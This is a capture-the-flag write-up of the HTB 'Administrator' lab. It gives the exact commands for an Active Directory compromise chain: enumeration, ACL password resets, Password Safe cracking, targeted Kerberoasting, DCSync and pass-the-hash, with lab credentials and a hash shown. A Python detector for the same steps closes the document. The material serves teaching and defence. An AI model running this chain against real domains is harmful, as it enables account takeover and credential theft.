Administrator (HTB – Medium)

This machine starts from a provided user credential (Olivia) and chains several Active Directory techniques: enumeration, password resets through ACL abuse, FTP access, Password Safe cracking, Kerberoasting, and finally a DCSync attack to obtain the Administrator hash.

Overview

Target: 10.10.11.42
Initial access: Olivia (provided by HTB)
Domain: administrator.htb
Goal: escalate through multiple users until DCSync is possible.

Enumeration

Initial credential:

Olivia : ichliebedich

Enumerating users:

$ enum4linux-ng -u Olivia -p 'ichliebedich' 10.10.11.42
Users found: olivia, michael, benjamin, emily, ethan, alexander, emma, administrator

LDAP enumeration:

$ nxc ldap 10.10.11.42 -u users.txt -p 'ichliebedich' --users

WinRM check:

$ nxc winrm 10.10.11.42 -u olivia -p 'ichliebedich' -X 'ipconfig'
-> Works

BloodHound collection:

$ nxc ldap 10.10.11.42 -u olivia -p 'ichliebedich' --bloodhound --collection ALL --dns-server 10.10.11.42
-> Output saved to bloodhound.zip

BloodHound was used to inspect privilege relations between users.

Foothold

$ evil-winrm -i 10.10.11.42 -u olivia -p 'ichliebedich'

Nothing useful in Olivia’s profile. BloodHound shows that Olivia can reset Michael’s password.

Privilege Escalation Path

1. Olivia → Michael

PS> Set-ADAccountPassword -Identity "Michael" -NewPassword (ConvertTo-SecureString "NewPassword123!" -AsPlainText -Force)

2. Michael → Benjamin (run from a session authenticated as Michael with the new password)

PS> Set-ADAccountPassword -Identity "Benjamin" -NewPassword (ConvertTo-SecureString "NewPassword123!" -AsPlainText -Force)

3. Benjamin → FTP Access

Benjamin can authenticate to FTP using the new password.

$ ftp 10.10.11.42
User: benjamin
Pass: NewPassword123!
Files:
Backup.psafe3

Password Safe Cracking

Crack the Password Safe file:

$ pwsafe2john Backup.psafe3 > Backup.psafe3.john
$ john Backup.psafe3.john -w=/usr/share/wordlists/rockyou.txt
-> tekieromucho

Open the file to retrieve stored credentials:

emily : UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Emily Access

$ evil-winrm -i 10.10.11.42 -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
-> user.txt

BloodHound shows Emily has GenericWrite over Ethan. GenericWrite lets Emily write attributes on Ethan's account, including an SPN, which is what makes the account Kerberoastable (targeted Kerberoasting).

Kerberoasting Ethan

Clock skew fix (if needed; Kerberos rejects requests when the client clock is more than 5 minutes off the DC by default):

# ntpdate 10.10.11.42   (as root)

Request SPN ticket:

$ impacket-GetUserSPNs administrator.htb/emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb -dc-ip 10.10.11.42 -request
-> TGS hash for ethan, saved to kerberoast-hash.txt

Crack the hash:

$ hashcat -a 0 -m 13100 kerberoast-hash.txt -O /usr/share/wordlists/rockyou.txt -o cracked.txt
-> ethan : limpbizkit

Ethan Access

$ nxc smb 10.10.11.42 -u ethan -p 'limpbizkit'
-> Valid credentials

BloodHound shows Ethan has DCSync privileges.

DCSync Attack

$ impacket-secretsdump 'administrator.htb'/'ethan':'limpbizkit'@10.10.11.42

Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::

Administrator Access

$ evil-winrm -i 10.10.11.42 -u Administrator -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
-> root.txt

Conclusion

The machine chains several AD privilege abuses: password resets through ACL misconfigurations, credential extraction from a Password Safe file, Kerberoasting, and finally DCSync. The final compromise is achieved by abusing Ethan’s replication privileges to obtain the Administrator NT hash.
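From the defender's side, each link of this chain leaves a distinct Windows Security event: the ACL password resets (4724), the Kerberoast (4769 with an RC4 ticket for a user SPN) and the DCSync (4662 exercising replication rights from a non-DC account). The following is an added detection example, not part of the original writeup; the events are constructed records in the shape a SIEM normalises them to, and the DC/admin account lists are assumptions.

```python
"""Detection logic for the three noisy steps of this chain (ACL password reset,
Kerberoast, DCSync) run over constructed Windows Security event records."""
from typing import Iterable

# Extended-right GUIDs that turn a 4662 event into a DCSync indicator
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
RC4_HMAC = "0x17"  # etype Kerberoasting tools request by default

def detect(events: Iterable[dict], dc_accounts: set, admins: set) -> list:
    """Return one alert string per suspicious event (lower-cased name matching)."""
    alerts = []
    for e in events:
        eid, who = e["EventID"], e.get("SubjectUserName", "").lower()
        if eid == 4724 and who not in admins:
            # Password reset by a non-admin: ForceChangePassword / ACL abuse
            alerts.append(f"4724: {who} reset password of {e['TargetUserName']}")
        elif (eid == 4769 and e.get("TicketEncryptionType") == RC4_HMAC
              and not e["ServiceName"].endswith("$")):
            # RC4 service ticket for a user (non-machine) SPN: Kerberoast
            alerts.append(f"4769: RC4 TGS for {e['ServiceName']} by {e['TargetUserName']}")
        elif (eid == 4662 and who not in dc_accounts
              and any(g in e.get("Properties", "").lower() for g in REPLICATION_RIGHTS)):
            # Replication rights exercised by something that is not a DC: DCSync
            alerts.append(f"4662: replication rights used by {who}")
    return alerts

# Constructed events mirroring the chain above (not real logs from the box)
SAMPLE_EVENTS = [
    {"EventID": 4724, "SubjectUserName": "olivia", "TargetUserName": "michael"},
    {"EventID": 4724, "SubjectUserName": "administrator", "TargetUserName": "emma"},
    {"EventID": 4769, "TargetUserName": "emily@ADMINISTRATOR.HTB", "ServiceName": "ethan",
     "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "DC$@ADMINISTRATOR.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12"},
    {"EventID": 4662, "SubjectUserName": "ethan",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "DC$", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]

def run_sample() -> list:
    # Assumed: the only DC account is DC$ and the only legitimate resetter is administrator
    return detect(SAMPLE_EVENTS, dc_accounts={"dc$"}, admins={"administrator"})

if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

Each rule fires exactly once on the sample: the first reset, the RC4 ticket for ethan, and ethan's replication call; the admin reset, the AES machine ticket and the DC's own replication are ignored.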